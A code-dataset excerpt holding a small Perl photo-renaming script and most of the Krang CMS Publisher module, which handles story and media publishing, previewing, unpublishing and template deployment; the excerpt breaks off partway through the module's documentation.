ed661e330d7676dc14af97d1a590752e2bbaac27 | 509 | pl | Perl | notes/photo_rename.pl | david-loffredo/pixtag | 3ad6814427b19729db0952b0cb81a7b395e95824 | [
"Apache-2.0"
] | null | null | null | notes/photo_rename.pl | david-loffredo/pixtag | 3ad6814427b19729db0952b0cb81a7b395e95824 | [
"Apache-2.0"
] | null | null | null | notes/photo_rename.pl | david-loffredo/pixtag | 3ad6814427b19729db0952b0cb81a7b395e95824 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/perl
# $RCSfile$
# $Revision$ $Date$
# Auth: Dave Loffredo (loffredo@steptools.com)
## $usage = "Usage: $0 <prefix> <number> <files>";
$usage = "Usage: $0 <oldprefix> <newprefix> <files>";
$count=0;
# Process the command line arguments
for (@ARGV) {
$file = $_;
$count++;
$newfile = sprintf "20030101_s%05d_dd.jpg", $count;
next unless -f $file;
next if $file eq $newfile;
#is it a regular file?
print "converting $file to $newfile\n";
rename $file, $newfile;
}
| 22.130435 | 55 | 0.616896 |
ed965543ec8050cc27aaff8668dfd4df73557209 | 86,488 | pm | Perl | lib/Krang/Publisher.pm | jmhutch/krang | fb96334f1be957ebbe63370ac50d989e28c3a8eb | [
"BSD-3-Clause"
] | 1 | 2018-02-15T03:54:35.000Z | 2018-02-15T03:54:35.000Z | lib/Krang/Publisher.pm | jmhutch/krang | fb96334f1be957ebbe63370ac50d989e28c3a8eb | [
"BSD-3-Clause"
] | 1 | 2018-07-24T21:38:29.000Z | 2018-07-24T22:36:36.000Z | lib/Krang/Publisher.pm | jmhutch/krang | fb96334f1be957ebbe63370ac50d989e28c3a8eb | [
"BSD-3-Clause"
] | 2 | 2018-07-24T21:48:08.000Z | 2020-05-25T18:18:05.000Z | package Krang::Publisher;
=head1 NAME
Krang::Publisher - Center of the Publishing Universe.
=head1 SYNOPSIS
use Krang::ClassLoader 'Publisher';
my $publisher = new pkg('Publisher')();
# Publish a list of stories to the preview path.
# returns preview URL of first story in the list.
my $url = $publisher->preview_story(story => \@stories);
# Publish a list of stories to the publish path.
$publisher->publish_story(story => \@stories);
# unpublish a story, usually called from $story->delete
$publisher->unpublish_story(story => $story);
# Publish a media object to the preview path.
# Returns the media URL if successful.
$url = $publisher->preview_media(media => $media);
# Publish a media object to the preview path.
# Returns the media URL if successful.
$url = $publisher->publish_media(media => $media);
# unpublish a media object, usually called from $media->delete
$publisher->unpublish_media(media => $media);
# Get the list of related stories and media that will get published
my $asset_list = $publisher->asset_list(story => [$story1, $story2]);
# Place a Krang::Template template into the production path, to be
# used when publishing.
$publisher->deploy_template(template => $template);
# Remove a template from the production path.
$publisher->undeploy_template(template => $template);
# Returns the mark used internally to break content into pages.
my $break_txt = $publisher->PAGE_BREAK();
# Return the Krang::Story object of the story currently being published.
my $story = $publisher->story();
# Return the Krang::Category object for the current category of the
# story being published.
my $category = $publisher->category();
# Return the filename for a given page of the story being published.
my $filename = $publisher->story_filename(page => $page_num);
# determine if we're in preview mode or publish mode.
$bool = $publisher->is_preview();
$bool = $publisher->is_publish();
# check to see if an object will be published, given its current state
$bool = $publisher->test_publish_status(object => $story, mode => 'publish');
=head1 DESCRIPTION
Krang::Publisher is responsible for coordinating the various
components that make up a Story (Elements, Media, Categories), and
putting them all together, out on the filesystem, for the world + dog
to see. The publish process will result in either 'preview' or
'publish' output - content-wise, they are indistinguishable.
In both the preview and publish process, stories are checked for
related media (see L<Krang::Story>->linked_media()). Media objects
will be copied into the proper output directory as part of the build
process.
Unless C<version_check> is turned off, all related assets will compare
C<version()> with C<preview_version()> or C<published_version()>, to see
if the currently live version (in either preview or publish, depending
on the mode) is the latest saved version. If so, the asset will not
be published, though it will be checked for additional related assets
to publish.
See L<Krang::ElementClass::TopLevel>->force_republish() to bypass the
C<version_check> functionality.
In the publish (but not preview) process, stories will also be checked
for linked stories (see L<Krang::Story>->linked_stories()). Any
linked-to stories will be checked for publish status, and will be
published if they are marked as unpublished.
=cut
use Krang::ClassFactory qw(pkg);
use strict;
use warnings;
use Carp;
use File::Spec::Functions;
use File::Copy qw(copy);
use File::Path;
use File::Temp qw(tempdir);
use Time::Piece;
use Krang::ClassLoader Conf => qw(KrangRoot instance PreviewSSL EnablePreviewEditor IgnorePreviewRelatedStoryAssets IgnorePreviewRelatedMediaAssets);
use Krang::ClassLoader 'Story';
use Krang::ClassLoader 'Category';
use Krang::ClassLoader 'Template';
use Krang::ClassLoader 'IO';
use Krang::ClassLoader History => qw(add_history);
use Krang::ClassLoader DB => qw(dbh);
use Krang::ClassLoader Element => qw(foreach_element);
use Krang::ClassLoader Log => qw(debug info critical);
use constant PUBLISHER_RO => qw(is_publish is_preview story category);
use constant PAGE_BREAK => "<<<<<<<<<<<<<<<<<< PAGE BREAK >>>>>>>>>>>>>>>>>>";
use constant CONTENT => "<<<<<<<<<<<<<<<<<< CONTENT >>>>>>>>>>>>>>>>>>";
use constant ADDITIONAL_CONTENT => "KRANG_ADDITIONAL_CONTENT";
use Exception::Class
'Krang::Publisher::FileWriteError' =>
{fields => ['story_id', 'media_id', 'template_id', 'source', 'destination', 'system_error']},
'Krang::Publisher::ZeroSizeOutput' => {fields => ['story_id', 'category_url', 'story_class']};
use Krang::ClassLoader MethodMaker => (
new_with_init => 'new',
new_hash_init => 'hash_init',
get => [PUBLISHER_RO]
);
=head1 INTERFACE
=head2 FIELDS
Access to fields for this object are provided by
Krang::MethodMaker. All fields are accessible in a B<read-only>
fashion. The value of fields can be obtained in the following
fashion:
$value = $publisher->field_name();
The available fields for a publish object are:
=over
=item * is_preview
Returns a 1 if the current publish run is in preview-mode, 0
otherwise.
=item * is_publish
Returns a 1 if the current publish run is in publish-mode (e.g. going
live), 0 otherwise.
=item * category
Returns a Krang::Category object for the category currently being
published.
=item * story
Returns a Krang::Story object for the Story currently being published.
=back
=cut
=head2 METHODS
=over
=item C<< $publisher = Krang::Publisher->new(); >>
Creates a new Krang::Publisher object. No parameters are needed at
this time.
=cut
#
# init()
#
# Sanity check as part of load.
#
sub init {
my $self = shift;
my %args = @_;
$self->hash_init(%args);
return;
}
=item C<< $url = $publisher->preview_story(story => $story) >>
Generates a story, saving it to the preview doc root on the
filesystem. Returns a URL to the story if successful, or will throw
one of several potential Exceptions (potential issues: filesystem
problems, exceptions thrown by other objects, anything else?) in the
event something goes wrong.
Arguments:
=over
=item * C<story>
A single L<Krang::Story> object.
=item * C<unsaved>
defaults to 0. If C<unsaved> is true,
L<Krang::Story>->preview_version will be set to -1. What this does
is force a republish of the story object to the preview path the next
time the object comes up as a related object to a story being
previewed.
As part of the publish process, all media and stories linked to by
C<$story> will be examined. If the current version of each object has
not been published to preview, it will be. If the object has been
previewed previously, it will be skipped.
=item * C<version_check>
Defaults to 1. When true, it checks all related stories and media to
see if the current version has been published previously to the
preview path, skipping those that have. When false, it will publish
all related assets, regardless of whether or not the current version
has been published to preview before.
=item * C<remember_asset_list>
Boolean, defaults to false.
If true, the C<Krang::Publisher> object will remember these media
objects, and will skip re-publishing them if they come up again
(e.g. if linked to a story being published).
This only affects successive publish calls to a single
C<Krang::Publisher> object. See C<bin/krang_publish> for an example
of this functionality being used.
=item * C<callback>
The optional parameter C<callback> will point to a subroutine which is
called when each object is published to the preview location. It
recieves three named parameters:
=over
=item C<object>
The affected object.
=item C<counter>
The index of the current object in the list of objects being published.
=item C<total>.
The total number of objects being published.
=back
=back
=cut
sub preview_story {
my $self = shift;
my %args = @_;
# set internal mode - preview, not publish.
$self->_set_preview_mode();
# this is needed so that element templates don't get Krang's templates
local $ENV{HTML_TEMPLATE_ROOT} = "";
my $story = $args{story} || croak __PACKAGE__ . ": missing required argument 'story'";
my $callback = $args{callback};
my $unsaved = (exists($args{unsaved})) ? $args{unsaved} : 0;
my $version_check = (exists($args{version_check})) ? $args{version_check} : 1;
my $keep_asset_list = $args{remember_asset_list} || 0;
# deploy any templates flagged as testing for this user
$self->_deploy_testing_templates();
my $publish_list = $self->asset_list(
story => [$story],
version_check => $version_check
);
$self->_process_preview_assets(
publish_list => $publish_list,
callback => $callback,
unsaved => $unsaved,
story => $story
);
# cleanup - remove any testing templates.
$self->_undeploy_testing_templates();
$self->_clear_asset_lists() unless ($keep_asset_list);
return $story->preview_url;
}
=item C<< $publisher->publish_story(story => $story, callback => \%onpublish) >>
Publishes a story to the live webserver document root, as set by
publish_path.
When a story is published, it is published under all categories it is
associated with (see Krang::Story->categories()).
As part of the publish process, all media and stories linked to by
$story will be examined. For each of these objects, if the latest
version has not yet been published, it will be. If the current
version has been published, it will be skipped (though the objects
links will also be checked).
If you do not care about related assets (WARNING - You want to care!),
you can set the argument I<disable_related_assets> =>1
If the user attempts to publish an object that is checked out by
someone else, it will get skipped.
It is assumed that the UI will prevent a user from attempting to
publish something when they do not have permissions. The only
access-control issues that will come up here would involve filesystem
permissions.
Arguments:
=over
=item * C<story>
Either a single L<Krang::Story> object, or a reference to an array of
L<Krang::Story> objects.
=item * C<disable_related_assets>
Defaults to 0. If true, no link-checking is done, only the items
passed in as part of the C<story> argument are published.
=item * C<version_check>
Defaults to 1. When true, it checks all related stories and media to
see if the current version has been published previously, skipping
those that have. When false, it will publish all related assets,
regardless of whether or not the current version has been published
before.
=item * C<maintain_versions>
Defaults to 0. If true, will re-publish the last-published
version of each asset rather than the latest version.
=item * C<remember_asset_list>
Boolean, defaults to false.
If true, the C<Krang::Publisher> object will remember these media
objects, and will skip re-publishing them if they come up again
(e.g. if linked to a story being published).
This only affects successive publish calls to a single
C<Krang::Publisher> object. See C<bin/krang_publish> for an example
of this functionality being used.
=item * C<callback>
The optional parameter C<callback> will point to a subroutine which is
called when each object is published to the preview location. It
recieves three named parameters:
=over
=item C<object>
The affected object.
=item C<counter>
The index of the current object in the list of objects being published.
=item C<total>.
The total number of objects being published.
=back
=item * C<skip_callback>
The optional parameter C<skip_callback> is a pointer to a subroutine
which is called whenever an object is skipped during the publish
process, for whatever reason. It takes four named parameters:
=over
=item C<object>
The object being skipped during the publish run.
=item C<error>
The type of error. C<output_error>, C<checked_out>, and a number of
internal exceptions are the current set.
=item C<path>
The location on the filesystem where the object was to be published to.
=item C<error_msg>
A text message explaining the error in more detail.
=back
=back
=cut
sub publish_story {
my $self = shift;
my %args = @_;
# set internal mode - publish, not preview.
$self->_set_publish_mode();
my $story = $args{story} || croak __PACKAGE__ . ": missing required argument 'story'";
my $unsaved = (exists($args{unsaved})) ? $args{unsaved} : 0;
my $version_check = (exists($args{version_check})) ? $args{version_check} : 1;
my $maintain_versions = (exists($args{maintain_versions})) ? $args{maintain_versions} : 0;
my %history_args;
if ( exists($args{scheduled_by}) ) {
$history_args{scheduled_by} = $args{scheduled_by};
$history_args{schedule_id} = $args{schedule_id};
}
my $implication_map = { map {$self->_implication_key($_) => 'original publish list'} (ref $story eq 'ARRAY') ? @$story : ($story) };
# callbacks
my $callback = $args{callback};
my $skip_callback = $args{skip_callback};
my $no_related_check =
(exists($args{disable_related_assets})) ? $args{disable_related_assets} : 0;
my $keep_asset_list = $args{remember_asset_list} || 0;
my $user_id = $ENV{REMOTE_USER};
my $publish_list;
# this is needed so that element templates don't get Krang's templates
local $ENV{HTML_TEMPLATE_ROOT} = "";
# build the list of assets to publish.
if ($no_related_check) {
debug(__PACKAGE__ . ": disabling related_assets checking for publish");
if (ref $story eq 'ARRAY') {
$publish_list = $story;
} else {
push @$publish_list, $story;
}
# normally _build_asset_list() handles the 'maintain_version' option, so
# when running in 'disable_related_assets' mode we need to handle it here
if ($maintain_versions) {
my @stories;
foreach my $s (@$publish_list) {
if ($s->checked_out && ($s->checked_out_by != $user_id)) {
# if story is checked out to another user, it shouldn't get published anyway
# (doing so would clear the checked-out flag), so we don't get old version
push @stories, $s;
} else {
# story is not checked out, so we grab last-published version (if any)
my $v = $s->published_version;
next unless $v;
if ($v == $s->version) {
push @stories, $s;
} else {
push @stories, pkg('Story')->find(story_id => $s->story_id, version => $v);
}
}
}
$publish_list = \@stories;
}
} else {
$publish_list = $self->asset_list(
story => $story,
implication_map => $implication_map,
version_check => $version_check,
maintain_versions => $maintain_versions
);
}
$self->_process_assets(
publish_list => $publish_list,
implication_map => $implication_map,
skip_callback => $skip_callback,
callback => $callback,
user_id => $user_id,
remember_asset_list => $keep_asset_list,
history_args => \%history_args
) if scalar(@$publish_list);
$self->_clear_asset_lists() unless ($keep_asset_list);
}
=item C<< $publisher->unpublish_story(story => $story) >>
Removes a story from its published locations. Usually called by
$story->delete. Affects both preview and publish locations.
The C<published>, C<publish_date> and C<published_version>
attributes of the L<Krang::Story> object all removed and set to C<undef>.
=cut
sub unpublish_story {
my ($self, %arg) = @_;
my $dbh = dbh;
my $story = $arg{story} || croak __PACKAGE__ . ": missing required argument 'story'";
# get location list, preview and publish
my $paths =
$dbh->selectcol_arrayref("SELECT path FROM publish_story_location WHERE story_id = ?",
undef, $story->story_id);
# neither published nor previewed?
return unless @$paths;
# delete story in publish and/or preview dir(s)
foreach my $path (@$paths) {
next unless -f $path;
# make sure this path isn't claimed by another story
my ($claimed_by_story_id) =
$dbh->selectrow_array(
"SELECT story_id FROM publish_story_location WHERE path = ? AND story_id != ?",
undef, $path, $story->story_id);
if ($claimed_by_story_id) {
next unless $self->_is_path_claim_stale(
type => 'story',
claimed_id => $claimed_by_story_id,
claimed_path => $path,
);
debug(__PACKAGE__ . ": clearing stale publish_story_location entry for path=" . $path . " by story id=" . $claimed_by_story_id);
# clean the stale claim
$dbh->do('DELETE FROM publish_story_location WHERE story_id = ? AND path = ?', undef, $claimed_by_story_id, $path);
}
unlink($path)
or croak("Unable to delete file '$path' during unpublish : $!");
}
# delete the dir itself - if it's empty
my @cats = $story->categories();
foreach my $cat (@cats) {
# only if the story isn't a "Cover"
next if ($cat->url eq $story->url);
my %path_args = (category => $cat);
for my $dir ($story->preview_path(%path_args), $story->publish_path(%path_args)) {
next unless -d $dir;
opendir(DIRH, $dir)
or croak("Unable to open directory $dir during unpublish: $!");
my @files = grep { not /^\.\.?$/ } readdir(DIRH);
closedir(DIRH);
next if @files;
rmdir($dir)
or croak("Unable to delete dir '$dir' during unpublish : $!");
}
}
# clean the table
$dbh->do('DELETE FROM publish_story_location WHERE story_id = ?', undef, $story->story_id);
# unset the publish flags
$story->{published_version} = undef;
$story->{publish_date} = undef;
$dbh->do(
'UPDATE story SET published_version = ?, publish_date = ? WHERE story_id = ?',
undef,
$story->{published_version},
$story->{publish_date},
$story->{story_id}
);
}
=item C<< $publisher->unpublish_media(media => $media) >>
Removes a media object from its published locations. Usually called
by $media->delete. Affects both preview and publish locations.
The C<published>, C<publish_date> and C<published_version>
attributes of the L<Krang::Media> object are reset to C<undef>.
=cut
sub unpublish_media {
my ($self, %arg) = @_;
my $dbh = dbh;
my $media = $arg{media} || croak __PACKAGE__ . ": missing required argument 'media'";
# get location list, preview and publish
my $paths =
$dbh->selectcol_arrayref("SELECT path FROM publish_media_location WHERE media_id = ?",
undef, $media->media_id);
# delete
foreach my $path (@$paths) {
next unless -f $path;
unlink($path)
or croak("Unable to delete file '$path' during unpublish : $!");
}
# clean the table
$dbh->do('DELETE FROM publish_media_location WHERE media_id = ?', undef, $media->media_id)
if @$paths;
# unset the publish flags
$media->{published_version} = undef;
$media->{publish_date} = undef;
$media->{published} = 0;
# update the DB.
$dbh->do(
'UPDATE media
SET published_version = ?,
publish_date = ?,
published = 0
WHERE media_id = ?',
undef,
$media->{published_version},
$media->{publish_date},
$media->{media_id}
);
# if media element has an unpublish() method, call it
if ($media->element->class->can('unpublish')) {
$media->element->class->unpublish(
publisher => $self,
media => $media,
element => $media->element
);
}
}
=item C<< $url = $publisher->preview_media(media => $media, unsaved => 1) >>
Copies a media file out to the webserver doc root for the preview
website.
Arguments:
=over
=item * C<media>
Required. The L<Krang::Media> object being previewed.
=item * C<unsaved>
Optional, defaults to 0. If C<unsaved> is true,
L<<Krang::Media->preview_version>> will be set to -1. What this does
is force a republish of the media object to the preview path the next
time the object comes up as a related object to a story being
previewed.
=item * C<remember_asset_list>
Boolean, defaults to false.
If true, the C<Krang::Publisher> object will remember these media
objects, and will skip re-publishing them if they come up again
(e.g. if linked to a story being published).
This only affects successive publish calls to a single
C<Krang::Publisher> object. See C<bin/krang_publish> for an example
of this functionality being used.
=back
Returns a url to the media file on the preview website if successful.
Will throw an exception if there are problems with the copy.
=cut
sub preview_media {
my $self = shift;
my %args = @_;
$self->_set_preview_mode();
my $keep_asset_list = $args{remember_asset_list} || 0;
my $media = $args{media} || croak __PACKAGE__ . ": Missing argument 'media'!\n";
my $unsaved = (exists($args{unsaved})) ? $args{unsaved} : 0;
# add it to the asset list
unless ($unsaved) {
$self->_mark_asset(object => $media);
}
$media->mark_as_previewed(unsaved => $unsaved);
$self->_clear_asset_lists() unless ($keep_asset_list);
return $self->_write_media(media => $media);
}
=item C<< $url = $publisher->publish_media(media => $media) >>
Copies a media file out to the webserver doc root for the publish website.
Arguments:
=over
=item * C<media>
Required. The Krang::Media object being published.
=item * C<remember_asset_list>
Boolean, defaults to false.
If true, the C<Krang::Publisher> object will remember these media
objects, and will skip re-publishing them if they come up again
(e.g. if linked to a story being published).
This only affects successive publish calls to a single
C<Krang::Publisher> object. See C<bin/krang_publish> for an example
of this functionality being used.
=item * C<maintain_versions>
Defaults to 0. If true, we will re-publish the last-published
version of the media (if any) rather than the latest.
=back
Returns a url to the media file on the publish website if successful.
If the user attempts to publish content that is checked out by someone
else, it will get skipped.
It is assumed that the UI will prevent a user from attempting to
publish something when they do not have permissions.
Will throw an exception if there are problems with the copy.
=cut
sub publish_media {
my $self = shift;
my %args = @_;
$self->_set_publish_mode();
# callbacks
my $callback = $args{callback};
my $skip_callback = $args{skip_callback};
my $maintain_versions = $args{maintain_versions} || 0;
my $keep_asset_list = $args{remember_asset_list} || 0;
croak(__PACKAGE__ . ": Missing argument 'media'!\n") unless (exists($args{media}));
my %history_args;
if ( exists($args{scheduled_by}) ) {
$history_args{scheduled_by} = $args{scheduled_by};
}
my $implication_map = { map {$self->_implication_key($_) => 'original publish list'} (ref $args{media} eq 'ARRAY') ? @{$args{media}} : ($args{media}) };
my $publish_list;
if (ref $args{media} eq 'ARRAY') {
$publish_list = $args{media};
} else {
push @$publish_list, $args{media};
}
$publish_list = $self->_add_category_linked_stories($publish_list, $implication_map) unless $ENV{KRANG_TEST};
my @urls = $self->_process_assets(
publish_list => $publish_list,
implication_map => $implication_map,
skip_callback => $skip_callback,
callback => $callback,
user_id => $ENV{REMOTE_USER},
remember_asset_list => $keep_asset_list,
history_args => \%history_args
) if scalar(@$publish_list);
$self->_clear_asset_lists() unless ($keep_asset_list);
return @urls;
}
=item C<< $asset_list = $publisher->asset_list(story => $story) >>
Returns the list of stories and media objects that will get published
if either L<publish_story()> or L<preview_story()> is called.
The sub calls $story->linked_stories() and $story->linked_media() to
generate the lists, recursively operating on the results generated by
$story->linked_stories().
If successful, it will return lists of L<Krang::Story> and
L<Krang::Media> objects that will get published along with $story. At
the absolute minimum (no linked stories or media), $stories->[0] will
contain the originally submitted parameter $story.
Arguments:
=over
=item * C<story>
The story parameter can either be a single L<Krang::Story> object or a
list of L<Krang::Story> objects.
=item * C<keep_asset_list>
Defaults to false. If true, the internal list of checked stories is
not cleared upon completion. If you are going to be making multiple
successive calls to asset_list(), and want to ensure that the
returning asset list does not contain assets from previous calls, set
to true.
=item * C<mode>
Optional. Either 'preview' or 'publish'. If not set, checks to see
if either C<is_preview()> or C<is_publish> is true. If neither are
true, will croak.
=item * C<version_check>
Defaults to true. If true, every related asset will be checked to see
if either C<< $object->preview_version() >> or
C<< $object->published_version() >> (depending on C<mode> above) is equal
to C<< $object->version() >>. If so, it won't be published, but its'
related assets will still be checked.
Setting C<version_check> to 0 (false) will result in the original
Krang behavior - all related content will be published, regardless of
versioning.
This addition is a performance improvement - the purpose is to keep
from publishing content that has not changed since the last
publishing.
=item * C<maintain_versions>
Defaults to 0. If true (and in publish mode), we will build a list of the
last-published version of each asset (if any) rather than the latest version.
=back
=cut
sub asset_list {
my $self = shift;
my %args = @_;
my $story = $args{story} || croak __PACKAGE__ . ": Missing parameter 'story'";
my $mode = $args{mode};
my $implication_map = $args{implication_map};
# my $keep_list = $args{keep_asset_list} || 0;
# my $keep_list = 0;
my $version_check = (exists($args{version_check})) ? $args{version_check} : 1;
# check publish mode.
if ($mode) {
if ($mode eq 'preview') { $self->_set_preview_mode(); }
elsif ($mode eq 'publish') { $self->_set_publish_mode(); }
else { croak __PACKAGE__ . ": unknown output mode '$mode'\n"; }
} else {
if ($self->is_preview()) { $mode = 'preview'; }
elsif ($self->is_publish()) { $mode = 'publish'; }
else {
croak "Publish mode unknown. Set the 'mode' argument'";
}
}
my $maintain_versions = (($mode eq 'publish') && $args{maintain_versions}) ? 1 : 0;
my @publish_list = $self->_build_asset_list(
object => $story,
implication_map => $implication_map,
version_check => $version_check,
maintain_versions => $maintain_versions,
initial_assets => 1
);
my $publish_list = \@publish_list;
$publish_list = $self->_add_category_linked_stories($publish_list, $implication_map)
if $mode eq 'publish' and not $ENV{KRANG_TEST};
# unless ($keep_list) {
# $self->_clear_asset_lists();
# }
return $publish_list;
}
=item C<< $publisher->_process_assets(%args) >>
Called by publish_story(). Method takes in a list of assets to publish in publish_list,
it than proceeds to write the assets to disk.
Arguments:
=over
=item * C<publish_list>
Array reference of assets to publish.
=item * C<skip_callback>
The optional parameter C<skip_callback> is a pointer to a subroutine
which is called whenever an object is skipped during the publish
process, for whatever reason. It takes four named parameters:
=item * C<callback>
The optional parameter C<callback> will point to a subroutine which is
called when each object is published to the preview location. It
recieves three named parameters:
=item * C<remember_asset_list>
Boolean if set to true will not call clear asset lists in _clear_asset_lists()
=item * C<user_id>
Needed to make sure the object to published isn't checked out by another user
=back
=cut
sub _process_assets {
my ($self, %args) = @_;
my $total = @{$args{publish_list}};
my $counter = 0;
my $user_id = $ENV{REMOTE_USER};
my $callback = $args{callback};
my $skip_callback = $args{skip_callback};
my $maintain_versions = $args{maintain_versions} || 0;
my @media_urls;
foreach my $object (@{$args{publish_list}}) {
$args{history_args}{origin} = $self->_stringify_implication_chain($args{implication_map}, $object);
if ($object->isa('Krang::Story')) {
if ($object->checked_out) {
if ($user_id != $object->checked_out_by) {
debug(__PACKAGE__ . ": skipping checked out story id=" . $object->story_id);
$skip_callback->(object => $object, error => 'checked_out')
if $skip_callback;
next;
}
}
eval {
my @paths = $self->_build_story_all_categories(
story => $object,
history_args => $args{history_args},
);
# fix up publish locations
$self->_rectify_publish_locations(
object => $object,
paths => \@paths,
preview => 0
);
# mark as published.
$object->mark_as_published();
# don't make callbacks on media, that's handled in publish_media().
$callback->(
object => $object,
total => $total,
counter => $counter++
) if $callback;
};
if (my $err = $@) {
if ($skip_callback) {
# call skip_callback, hopefully with a real error
# object
$skip_callback->(object => $object, error => $err);
} else {
# the skip_callback is not used by the CGIs,
# re-propegate the error so the UI can handle it.
die($err);
}
}
# clear the publish context to not dirty things for the
# next pass.
$self->clear_publish_context();
} elsif ($object->isa('Krang::Media')) {
# cannot publish assets checked out by other users.
if ($object->checked_out) {
if ($user_id != $object->checked_out_by) {
debug( __PACKAGE__
. ": skipping publish on checked out media object id="
. $object->media_id);
$skip_callback->(object => $object, error => 'checked_out') if $skip_callback;
next;
}
}
# if requested, re-publish last-published (instead of latest) version
if ($maintain_versions) {
my $v = $object->published_version;
next unless $v;
if ($v != $object->version) {
my ($object) =
pkg('Media')->find(media_id => $object->media_id, version => $v);
}
}
eval {
push @media_urls, $self->_write_media(media => $object);
# log event
my %history_args = $args{history_args} ? %{$args{history_args}} : ();
add_history(object => $object, action => 'publish', %history_args);
$object->mark_as_published();
$callback->(
object => $object,
total => $total,
counter => $counter++
) if $callback;
};
if ($@) {
if ($skip_callback) {
if (ref $@ && $@->isa('Krang::Publisher::FileWriteError')) {
$skip_callback->(
object => $object,
error => 'output_error',
path => $@->destination,
error_msg => $@->system_error
);
} else {
# call generic skip_callback.
$skip_callback->(object => $object, error => ref $@ ? $@->isa : $@);
}
}
# the skip_callback is not used by the CGIs - re-propegate the error so the UI
# can handle it.
else {
die($@);
}
}
}
}
return @media_urls;
}
=item C<< $publisher->_process_preview_assets(%args) >>
Called by preview_story(). Method takes in a list of assets to publish in publish_list,
it than proceeds to write the assets to the preview_path. Decoupling of asset list from publishing of assets, permits an more natural entry point for a subclass ( to be written at a later time) to provide parallel publishing behavior.
Arguments:
=over
=item * C<publish_list>
array reference of assets to publish to the preview location.
=item * C<callback>
The optional parameter C<callback> will point to a subroutine which is
called when each object is published to the preview location. It
recieves three named parameters:
=item * C<story>
Initial story object to preview.
=item * C<unsaved>
defaults to 0. If C<unsaved> is true,
L<Krang::Story>->preview_version will be set to -1. What this does
is force a republish of the story object to the preview path the next
time the object comes up as a related object to a story being
previewed.
As part of the publish process, all media and stories linked to by
C<$story> will be examined. If the current version of each object has
not been published to preview, it will be. If the object has been
previewed previously, it will be skipped.
=back
=cut
sub _process_preview_assets {
my ($self, %args) = @_;
my $total = @{$args{publish_list}};
my $counter = 0;
foreach my $object (@{$args{publish_list}}) {
if ($object->isa('Krang::Story')) {
my @paths = $self->_build_story_all_categories(story => $object);
# fix up publish locations
$self->_rectify_publish_locations(
object => $object,
paths => \@paths,
preview => 1
);
# make a note on preview status. Initial story may be in
# edit mode, the rest are not.
if ($object->story_id == $args{story}->story_id) {
$object->mark_as_previewed(unsaved => $args{unsaved});
} else {
$object->mark_as_previewed(unsaved => 0);
}
# clear context to not sully the next story.
$self->clear_publish_context;
} elsif ($object->isa('Krang::Media')) {
debug('Publisher.pm: Previewing media_id=' . $object->media_id());
$self->preview_media(media => $object);
}
$args{callback}->(
object => $object,
total => $total,
counter => $counter++
) if $args{callback};
}
}
=item C<< $filename = $publisher->deploy_template(template => $template); >>
Deploys the template stored in a L<Krang::Template> object into the template publish_path under $KRANG_ROOT.
The final path of the template is based on $category->url() and $template->element_class_name().
If successful, deploy_template() returns the final resting place of the template. In the event of an error, deploy_template() will croak.
deploy_template() makes no attempt to update the database as to the publish status or location of the template - that is the responsibility of Krang::Template (or should it call the appropriate method in Krang::Template?)
=cut
sub deploy_template {
my $self = shift;
my %args = @_;
my $template = $args{template} || croak __PACKAGE__ . ": Missing argument 'template'!\n";
# write the template out.
my $filename = $self->_write_template(template => $template);
# mark template as deployed.
$template->mark_as_deployed();
# log event.
add_history(object => $template, action => 'deploy');
return $filename;
}
=item C<< $publisher->undeploy_template(template => $template); >>
Removes the template specified by a L<Krang::Template> object from the template publish_path under $KRANG_ROOT.
The location of the template is based on $category->url() and $template->element_class_name().
If successful, undeploy_template() returns nothing. In the event of an error, undeploy_template() will croak.
undeploy_template() makes no attempt to update the database as to the publish status or location of the template - that is the responsibility of Krang::Template (or should it call the appropriate method in Krang::Template?)
=cut
sub undeploy_template {
my $self = shift;
my %args = @_;
my $template = $args{template} || croak __PACKAGE__ . ": Missing argument 'template'!\n";
my $category = $template->category();
my @tmpl_paths = $self->template_search_path(category => $category);
my $path = $tmpl_paths[0];
my $file = catfile($path, $template->filename());
if (-e $file) {
if (-d $file) {
croak __PACKAGE__ . ": template file '$file' is a directory - will not delete.\n";
}
unlink $file;
}
# mark template as undeployed.
$template->mark_as_undeployed();
# log event.
add_history(object => $template, action => 'undeploy');
return;
}
=item C<< $dir = $publisher->template_search_path(category => $category) >>
Given the current category, returns the list of directories that may
contain a template. The first element in the returning array contains
the directory of the current category, the last element contains the
directory of the root category (parent of all categories in the site).
Arguments:
=over
=item * C<category>
An optional argument - if not supplied, the current L<Krang::Category>
category in the publish run is used (usually the best choice).
=back
A note on preview: In preview mode, this method will check to see if
the user has a testing-template temporary directory (created if the
user has templates checked out & flagged for testing). If so, the
testing-template temporary directory paths will be interspersed with
the deployed-template dirs (in the order of TEST/PROD/TEST/PROD).
=cut
sub template_search_path {
my $self = shift;
my %args = @_;
my @subdirs = ();
my @paths = ();
my $category;
my $preview_root;
my $user_id = $ENV{REMOTE_USER};
# Root dir for this instance.
my $root = catdir(KrangRoot, 'data', 'templates', pkg('Conf')->instance());
if (exists($args{category})) {
if (!defined($args{category})) {
# if category arg is not defined, return root dir for instance.
# (but check for template testing)
if ($self->{is_preview}
&& exists($self->{testing_template_path}{$user_id}))
{
return ($self->{testing_template_path}{$user_id}, $root);
}
return $root;
}
$category = $args{category};
} else {
$category = $self->{category};
}
croak __PACKAGE__ . ': missing argument \'category\'' unless (defined($category));
@subdirs = split '/', $category->url();
while (@subdirs > 0) {
# if in preview mode, check to see if there's a template testing dir.
# add it if there is.
if ($self->{is_preview}
&& exists($self->{testing_template_path}{$user_id}))
{
push @paths, catfile($self->{testing_template_path}{$user_id}, @subdirs);
}
push @paths, catfile($root, @subdirs);
pop @subdirs;
}
# add root (possibly preview too) dir as well.
if ($self->{is_preview}
&& exists($self->{testing_template_path}{$user_id}))
{
push @paths, $self->{testing_template_path}{$user_id};
}
push @paths, $root;
return @paths;
}
=item C<< $txt = $publisher->page_break() >>
Returns the tag used internally to mark the break between pages in a
story. When a multi-page story is assembled by the
Krang::ElementClass element tree, it consists of a scaler containing
these break tags. The preview/publish process will split the scaler
along those tags to create the individual pages of the story.
No exceptions to throw.
=cut
sub page_break {
return PAGE_BREAK;
}
=item C<< $txt = $publisher->content() >>
Returns the tag used internally to mark the break between the top and
bottom sections of a category page. Once broken, the individual pages
of a story will be placed in between the two halves, and the full HTML
page will be assembled.
No exceptions to throw.
=cut
sub content {
return CONTENT;
}
=item C<< $publisher->additional_content_block(filename => $filename, content => $html, use_category => 1); >>
C<additional_content_block> creates an entry in the publisher that
will be re-visited once the entire story content has been constructed.
During the final output of the story, the content C<$html> will be
written out separately to C<$filename>.
C<content> and C<filename> arguments are required.
